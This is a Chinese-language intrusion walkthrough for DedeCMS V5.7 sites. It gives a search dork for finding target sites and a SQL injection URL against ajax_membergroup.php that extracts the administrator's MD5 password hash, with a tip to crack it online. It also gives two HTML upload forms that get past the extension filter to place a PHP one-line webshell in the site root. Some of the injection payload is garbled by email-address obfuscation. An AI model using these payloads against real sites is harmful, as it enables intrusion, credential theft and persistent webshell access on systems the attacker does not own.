--------------------------------------------------------
情简单整理下入侵测试的步骤:
漏洞利用实例
百度搜索关键字"Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc",获得使用DeDeCMS系统的网站。
注入漏洞。首先访问"/data/admin/ver.txt"页面获取系统最后升级时间,XXXXX说明已经修补2011年8月12日补丁,
然后访问"/member/ajax_membergroup.php?action=post&membergroup=1"页面,XXXXXX2说明存在该漏洞。
于是访问页面链接"/member/ajax_membergroup.php?action=post&[email protected]`‘` Union select pwd from `%[email protected]__admin` where 1 or [email protected]`‘`",
去掉前三位和最后一位,得到管理员的16位MD5码,www.cmd5.com在线破解成功。
上传漏洞。
要求网站开启新会员注册功能,首先注册新会员,无需通过邮件验证,只要登陆会员中心,然后访问页面链接
"/plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post",
说明通过"/plus/carbuyaction.php"已经成功调用了上传页面"/dialog/select_soft_post"
于是将Php一句话木马扩展名改为"rar"等,利用提交页面upload1.htm,
将下面的源码另存为upload1.htm,获得提交页面如图下。
<form
action="[url=http://127.1/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post]
http://127.1/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post[/url]" method="post"
enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="myfile.Php"/>
<button class="button2" type="submit">提交</button><br><br>
1,必须登陆用户。
2,将待上传PHP文件扩展名改为"zip|gz|rar|iso|doc|xsl|ppt|wps"其中之一。
3,newname为上传后的新文件名,扩展名使用大写绕过,如"Php"
提交后尽管页面出错,但是myfile.Php文件已经成功上传到网站根目录。
upload2.htm
<form name="form1" action="http://127.1/member/uploads_add.php" method="post" enctype="multipart/form-data" >
<input type="hidden" name="mediatype" value="4" />
<input type="hidden" name="_GET[cfg_mb_addontype]" value="P hp|Php|php" />
<input type="hidden" name="dopost" value="save" />
<input name="addonfile" type="file" id="addonfile" />
<button class="button2" type="submit" >提交</button>
</form>